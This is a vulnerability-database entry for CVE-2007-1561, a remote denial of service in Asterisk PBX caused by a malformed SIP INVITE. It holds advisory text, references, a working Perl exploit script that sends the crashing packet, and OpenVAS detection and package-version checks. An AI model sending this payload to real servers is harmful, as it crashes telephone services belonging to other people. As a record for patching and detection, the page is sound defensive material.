Search...

Asterisk Malformed SIP INVITE Request DoS

2007-03-21T09:04:09

ID OSVDB:34479
Type osvdb
Reporter Olivier Festor(), Radu State(), Humberto J. Abdelnur()
Modified 2007-03-21T09:04:09

Description

Vulnerability Description

Asterisk PBX contains a flaw that may allow a remote denial of service. The issue is triggered when a malformed SIP INVITE message containing two SDP headers is sent to the affected application. To exploit this issue, the first header must contain a valid IP address where the second must contain an invalid one. This will result in loss of availability for the asterisk service.

Technical Description

This vulnerability is only present if the SIP service accepts unauthenticated requests or proper authentication is provided.

Solution Description

Upgrade to version 1.2.17 or 1.4.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

References:

Vendor Specific News/Changelog Entry: http://asterisk.org/node/48339 Security Tracker: 1017794 Secunia Advisory ID:24564 Secunia Advisory ID:24719 Secunia Advisory ID:25582 Secunia Advisory ID:26602 Other Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00120.html Other Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200704-01.xml Other Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Jun/0003.html Other Advisory URL: http://www.sineapps.com/news.php?rssid=1707 Other Advisory URL: http://security.gentoo.org/glsa/glsa-200704-01.xml Mail List Post: http://seclists.org/fulldisclosure/2007/Mar/0315.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0358.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0299.html Mail List Post: http://voipsa.org/pipermail/voipsec_voipsa.org/2007-March/002275.html ISS X-Force ID: 33068 Generic Exploit URL: http://milw0rm.com/exploits/3566 FrSIRT Advisory: ADV-2007-1039 CVE-2007-1561 Bugtraq ID: 23031

JSON Vulners Source

Initial Source

{"bulletinFamily": "software", "viewCount": 4, "reporter": "Olivier Festor(), Radu State(), Humberto J. Abdelnur()", "references": [], "description": "## Vulnerability Description\nAsterisk PBX contains a flaw that may allow a remote denial of service. The issue is triggered when a malformed SIP INVITE message containing two SDP headers is sent to the affected application. To exploit this issue, the first header must contain a valid IP address where the second must contain an invalid one. This will result in loss of availability for the asterisk service.\n## Technical Description\nThis vulnerability is only present if the SIP service accepts unauthenticated requests or proper authentication is provided.\n## Solution Description\nUpgrade to version 1.2.17 or 1.4.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nAsterisk PBX contains a flaw that may allow a remote denial of service. The issue is triggered when a malformed SIP INVITE message containing two SDP headers is sent to the affected application. To exploit this issue, the first header must contain a valid IP address where the second must contain an invalid one. This will result in loss of availability for the asterisk service.\n## References:\nVendor Specific News/Changelog Entry: http://asterisk.org/node/48339\nSecurity Tracker: 1017794\n[Secunia Advisory ID:24564](https://secuniaresearch.flexerasoftware.com/advisories/24564/)\n[Secunia Advisory ID:24719](https://secuniaresearch.flexerasoftware.com/advisories/24719/)\n[Secunia Advisory ID:25582](https://secuniaresearch.flexerasoftware.com/advisories/25582/)\n[Secunia Advisory ID:26602](https://secuniaresearch.flexerasoftware.com/advisories/26602/)\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00120.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200704-01.xml\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Jun/0003.html\nOther Advisory URL: http://www.sineapps.com/news.php?rssid=1707\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200704-01.xml\nMail List Post: http://seclists.org/fulldisclosure/2007/Mar/0315.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-03/0358.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0299.html\nMail List Post: http://voipsa.org/pipermail/voipsec_voipsa.org/2007-March/002275.html\nISS X-Force ID: 33068\nGeneric Exploit URL: http://milw0rm.com/exploits/3566\nFrSIRT Advisory: ADV-2007-1039\n[CVE-2007-1561](https://vulners.com/cve/CVE-2007-1561)\nBugtraq ID: 23031\n", "affectedSoftware": [{"operator": "eq", "version": "1.4.1", "name": "Asterisk"}, {"operator": "eq", "version": "1.4.0", "name": "Asterisk"}, {"operator": "eq", "version": "1.2.15", "name": "Asterisk"}, {"operator": "eq", "version": "1.2.14", "name": "Asterisk"}, {"operator": "eq", "version": "1.2.16", "name": "Asterisk"}], "hashmap": [{"key": "affectedSoftware", "hash": "8ab36bd5d82a331fc56aad7d9625114c"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "07e73e3d05dac984f05885068fe0bf52"}, {"key": "cvss", "hash": "ed3111898fb94205e2b64cefef5a2081"}, {"key": "description", "hash": "1667bc6088d85ce0e34ea98e00b526d7"}, {"key": "href", "hash": "77eee66923bd65ef8851578c2404dc9d"}, {"key": "modified", "hash": "5f24a4569b146cbde6abec659d8bea95"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5f24a4569b146cbde6abec659d8bea95"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7015ce8306d7dd598881e10f1559d061"}, {"key": "title", "hash": "26c82ca2af17651c576d06e257c2b143"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:34479", "modified": "2007-03-21T09:04:09", "objectVersion": "1.2", "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2017-04-28T13:20:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1561"]}, {"type": "openvas", "idList": ["OPENVAS:13614125623109999992", "OPENVAS:58188", "OPENVAS:58577", "OPENVAS:850061"]}, {"type": "exploitdb", "idList": ["EDB-ID:3566"]}, {"type": "gentoo", "idList": ["GLSA-200704-01"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200704-01.NASL", "SUSE_ASTERISK-3543.NASL", "DEBIAN_DSA-1358.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7344"]}, {"type": "suse", "idList": ["SUSE-SA:2007:034"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1358-1:2659E"]}], "modified": "2017-04-28T13:20:30"}, "vulnersScore": 5.8}, "id": "OSVDB:34479", "title": "Asterisk Malformed SIP INVITE Request DoS", "hash": "6293e0328bf544ac91bd6e6a416747a80a517998b2a18fbe23b4325f9fb92018", "edition": 1, "published": "2007-03-21T09:04:09", "type": "osvdb", "history": [], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "cvelist": ["CVE-2007-1561"], "lastseen": "2017-04-28T13:20:30"}

{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "The channel driver in Asterisk before 1.2.17 and 1.4.x before 1.4.2 allows remote attackers to cause a denial of service (crash) via a SIP INVITE message with an SDP containing one valid and one invalid IP address.", "modified": "2018-10-16T16:39:00", "id": "CVE-2007-1561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1561", "published": "2007-03-21T19:19:00", "title": "CVE-2007-1561", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T18:47:46", "bulletinFamily": "exploit", "description": "Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit. CVE-2007-1561. Dos exploits for multiple platform", "modified": "2007-03-25T00:00:00", "published": "2007-03-25T00:00:00", "id": "EDB-ID:3566", "href": "https://www.exploit-db.com/exploits/3566/", "type": "exploitdb", "title": "Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit", "sourceData": "#!/usr/bin/perl\n# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY\n\nuse IO::Socket::INET;\n\ndie \"Usage $0 <dst> <dport> <dusername> <src> <sport> <susername>\" unless ($ARGV[5]);\n\n \n\n$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],\n\n Proto=>'udp',\n\n PeerAddr=>$ARGV[0]);\n\n\n$msg=\"INVITE sip:$ARGV[2]\\@$ARGV[0]:$ARGV[1] SIP/2.0\\r\\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\\r\\nTo: <sip:$ARGV[2]\\@$ARGV[0]:$ARGV[1]>\\r\\nFrom: <sip:$ARGV[3]:$ARGV[4]>;tag=01\\r\\nCall-ID: 01\\@$ARGV[3]\\r\\nContent-Type: application/sdp\\r\\nCSeq: 01 INVITE\\r\\nContent-Length: 187\\r\\n\\r\\nv=0\\r\\no=root 25903 25903 IN IP4 $ARGV[3]\\r\\ns=session\\r\\nc=IN IP4 $ARGV[3]\\r\\nc=IN IP4 910.188.8.2\\r\\nt=0 0\\r\\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\\r\\na=rtpmap:98 speex/16000\\r\\n\\r\\n\";\n\n$socket->send($msg);\n\n# milw0rm.com [2007-03-25]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3566/"}], "openvas": [{"lastseen": "2019-05-29T18:40:27", "bulletinFamily": "scanner", "description": "The remote Asterisk PBX SIP server is affected by an overflow vulnerability.", "modified": "2019-03-06T00:00:00", "published": "2008-08-22T00:00:00", "id": "OPENVAS:13614125623109999992", "href": "http://plugins.openvas.org/nasl.php?oid=13614125623109999992", "title": "Asterisk PBX SDP Header Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: asterisk_sdp_header_overflow.nasl 14010 2019-03-06 08:24:33Z cfischer $\n#\n# Asterisk PBX SDP Header Overflow Vulnerability\n#\n# Authors:\n# Ferdy Riphagen\n#\n# Copyright:\n# Copyright (C) 2008 Ferdy Riphagen\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:digium:asterisk\";\n\n# Note :\n# Because probably many systems running safe_asterisk\n# as a watchdog for the asterisk pid, this check could\n# be very false-negative prone. Additionally an INVITE\n# message on secure systems need authentication, so this\n# only works on systems using 'allowguest=yes' in sip.conf\n# and for peers without authentication info with the use\n# of an edited 'logins.nasl' (not supplied).\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.9999992\");\n script_version(\"$Revision: 14010 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-06 09:24:33 +0100 (Wed, 06 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_bugtraq_id(23031);\n script_cve_id(\"CVE-2007-1561\");\n script_name(\"Asterisk PBX SDP Header Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_family(\"Denial of Service\");\n script_copyright(\"This script is Copyright (C) 2008 Ferdy Riphagen\");\n script_dependencies(\"secpod_asterisk_detect.nasl\", \"logins.nasl\");\n script_mandatory_keys(\"Asterisk-PBX/Installed\");\n\n script_xref(name:\"URL\", value:\"http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053052.html\");\n script_xref(name:\"URL\", value:\"http://bugs.digium.com/view.php?id=9321\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Asterisk release 1.4.2/1.2.17 or newer.\");\n\n script_tag(name:\"summary\", value:\"The remote Asterisk PBX SIP server is affected by an overflow vulnerability.\");\n\n script_tag(name:\"impact\", value:\"This results in a Segmentation fault in 'chan_sip.c' crashing the Asterisk PBX service.\");\n\n script_tag(name:\"insight\", value:\"The application installed suffers from a remote overflow in the SIP service\n resulting in a denial of service. An attacker can send a malformed INVITE packet\n with two SDP headers, whitin the first header a existing IP address in the 'c=' variable\n and in the second SDP header a NOT existing IP address in 'c='.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"sip.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_location_and_proto( cpe:CPE, port:port ) )\n exit( 0 );\n\nproto = infos[\"proto\"];\n\nif( ! sip_alive( port:port, proto:proto ) )\n exit( 0 );\n\ntargethost = get_host_name();\nthishost = this_host();\nvtstrings = get_vt_strings();\nuser = vtstrings[\"lowercase\"];\n\nsdp_headers = string(\n \"v=0\\r\\n\",\n \"o=somehost 12345 12345 IN IP4 \", targethost, \"\\r\\n\",\n \"c=IN IP4 \", targethost, \"\\r\\n\",\n \"m=audio 16384 RTP/AVP 8 0 18 101\\r\\n\\r\\n\",\n \"v=1\\r\\n\",\n \"o=somehost 12345 12345 IN IP4 \", targethost, \"\\r\\n\",\n \"c=IN IP4 555.x.555.x.555\\r\\n\",\n \"m=audio 16384 RTP/AVP 8 0 18 101\");\n\nbad_invite = string(\n \"INVITE sip:\", targethost, \"\\r\\n\",\n \"Via: SIP/2.0/\", toupper( proto ), \" \", thishost, \":\", port, \"\\r\\n\",\n \"To: <sip:\", user, \"@\", targethost, \":\", port, \">\\r\\n\",\n \"From: <sip:\", user, \"@\", thishost, \":\", port, \">\\r\\n\",\n \"Call-ID: \", rand(), \"\\r\\n\",\n \"CSeq: \", rand(), \" INVITE\\r\\n\",\n \"Contact: <sip:\", user, \"@\", thishost, \">\\r\\n\",\n \"Max-Forwards: 0\\r\\n\",\n \"Content-Type: application/sdp\\r\\n\",\n \"Content-Length: \", strlen(sdp_headers), \"\\r\\n\\r\\n\",\n sdp_headers);\n\nexp = sip_send_recv( port:port, data:bad_invite, proto:proto );\nif( isnull( exp ) ) {\n if( ! sip_alive( port:port, proto:proto ) ) {\n security_message( port:port, proto:proto );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200704-01.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58188", "id": "OPENVAS:58188", "title": "Gentoo Security Advisory GLSA 200704-01 (asterisk)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Asterisk is vulnerable to two Denial of Service issues in the SIP channel.\";\ntag_solution = \"All Asterisk users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose net-misc/asterisk\n\nNote: Asterisk 1.0.x is no longer supported upstream so users should\nconsider upgrading to Asterisk 1.2.x.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200704-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=171467\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200704-01.\";\n\n \n\nif(description)\n{\n script_id(58188);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-1561\", \"CVE-2007-1594\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200704-01 (asterisk)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 1.2.14-r2\", \"rge 1.0.12-r2\"), vulnerable: make_list(\"lt 1.2.14-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:20:32", "bulletinFamily": "scanner", "description": "Check for the Version of asterisk", "modified": "2017-12-08T00:00:00", "published": "2009-01-28T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850061", "id": "OPENVAS:850061", "title": "SuSE Update for asterisk SUSE-SA:2007:034", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2007_034.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for asterisk SUSE-SA:2007:034\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Open Source PBX software Asterisk was updated\n to fix several security related bugs that allowed attackers to remotely\n crash asterisk or cause information leaks:\n\n - CVE-2007-1306: Asterisk allowed remote attackers to cause a denial\n of service (crash) by sending a Session Initiation Protocol (SIP)\n packet without a URI and SIP-version header, which results in a\n NULL pointer dereference.\n\n - CVE-2007-1561: The channel driver in Asterisk allowed remote\n attackers to cause a denial of service (crash) via a SIP INVITE\n message with an SDP containing one valid and one invalid IP address.\n\n - CVE-2007-1594: The handle_response function in chan_sip.c in Asterisk\n allowed remote attackers to cause a denial of service (crash)\n via a SIP Response code 0 in a SIP packet.\n\n - CVE-2007-1595: The Asterisk Extension Language (AEL) in pbx/pbx_ael.c\n in Asterisk does not properly generate extensions, which allows\n remote attackers to execute arbitrary extensions and have an unknown\n impact by specifying an invalid extension in a certain form.\n\n - CVE-2007-2294: The Manager Interface in Asterisk allowed\n remote attackers to cause a denial of service (crash) by using MD5\n authentication to authenticate a user that does not have a password\n defined in manager.conf, resulting in a NULL pointer dereference.\n\n - CVE-2007-2297: The SIP channel driver (chan_sip) in Asterisk did not\n properly parse SIP UDP packets that do not contain a valid response\n code, which allows remote attackers to cause a denial of service\n (crash).\n\n - CVE-2007-2488: The IAX2 channel driver (chan_iax2) in Asterisk\n did not properly null terminate data, which allows remote attackers\n to trigger loss of transmitted data, and possibly obtain sensitive\n information (memory contents) or cause a denial of service\n (application crash), by sending a frame that lacks a 0 byte.\";\n\ntag_impact = \"remote denial of service\";\ntag_affected = \"asterisk on SUSE LINUX 10.1, openSUSE 10.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850061);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:40:10 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2007-034\");\n script_cve_id(\"CVE-2007-1306\", \"CVE-2007-1561\", \"CVE-2007-1594\", \"CVE-2007-1595\", \"CVE-2007-2294\", \"CVE-2007-2297\", \"CVE-2007-2488\");\n script_name( \"SuSE Update for asterisk SUSE-SA:2007:034\");\n\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~1.2.13~23\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~1.2.5~12.12\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:03", "bulletinFamily": "scanner", "description": "The remote host is missing an update to asterisk\nannounced via advisory DSA 1358-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58577", "id": "OPENVAS:58577", "title": "Debian Security Advisory DSA 1358-1 (asterisk)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1358_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1358-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in Asterisk, a free\nsoftware PBX and telephony toolkit. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-1306\n\nMu Security discovered that a NULL pointer deference in the SIP\nimplementation could lead to denial of service.\n\nCVE-2007-1561\n\nInria Lorraine discovered that a programming error in the SIP\nimplementation could lead to denial of service.\n\nCVE-2007-2294\n\nIt was discovered that a NULL pointer deference in the manager\ninterface could lead to denial of service.\n\nCVE-2007-2297\n\nIt was discovered that a programming error in the SIP implementation\ncould lead to denial of service.\n\nCVE-2007-2488\n\nTim Panton and Birgit Arkestein discovered that a programming error\nin the IAX2 implementation could lead to information disclosure.\n\nCVE-2007-3762\n\nRussell Bryant discovered that a buffer overflow in the IAX\nimplementation could lead to the execution of arbitrary code.\n\nCVE-2007-3763\n\nChris Clark and Zane Lackey discovered that several NULL pointer\ndeferences in the IAX2 implementation could lead to denial of\nservice.\n\nCVE-2007-3764\n\nWill Drewry discovered that a programming error in the Skinny\nimplementation could lead to denial of service.\n\nFor the oldstable distribution (sarge) these problems have been fixed in\nversion 1.0.7.dfsg.1-2sarge5.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 1:1.2.13~dfsg-2etch1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1:1.4.11~dfsg-1.\n\nWe recommend that you upgrade your Asterisk packages.\";\ntag_summary = \"The remote host is missing an update to asterisk\nannounced via advisory DSA 1358-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201358-1\";\n\nif(description)\n{\n script_id(58577);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:19:52 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-1306\", \"CVE-2007-1561\", \"CVE-2007-2294\", \"CVE-2007-2297\", \"CVE-2007-2488\", \"CVE-2007-3762\", \"CVE-2007-3763\", \"CVE-2007-3764\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1358-1 (asterisk)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-web-vmail\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-gtk-console\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1.0.7.dfsg.1-2sarge5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.2.13~dfsg-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1.2.13~dfsg-2etch1\", 